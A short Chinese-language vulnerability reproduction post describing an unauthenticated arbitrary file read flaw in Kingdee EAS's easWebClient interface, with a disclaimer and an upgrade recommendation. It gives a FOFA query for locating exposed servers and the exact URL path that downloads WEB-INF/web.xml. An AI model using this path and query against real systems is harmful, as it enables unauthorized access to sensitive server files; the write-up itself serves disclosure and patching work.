金蝶-EAS easWebClient 任意文件读取漏洞复现

前言

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、产品简介

金蝶-EAS是一款面向大中型企业的管理软件，涵盖了财务、人力资源、采购、库存等多个功能模块，支持云计算和个性化定制，适合集团企业管理使用。

二、漏洞描述

金蝶EAS easWebClient 接口存在任意文件读取漏洞，未经授权的攻击者通过该漏洞读取任意文件，获取系统敏感信息。

三、影响范围

未知

四、复现环境

FOFA：

body="easSessionId" || header="easportal" || header="eassso/login" || banner="eassso/login" || body="/eassso/common" || (title="EAS系统登录" && body="金蝶")

五、漏洞复现

1.访问存在漏洞的网站

2.直接访问ip+port/easWebClient/deploy/client/ctrlhome/webapps/extweb/WEB-INF/web.xml即可下载文件

3.成功

六、修复建议

官方已修复该漏洞，请及时升级到最新版本。

https://www.kingdee.com/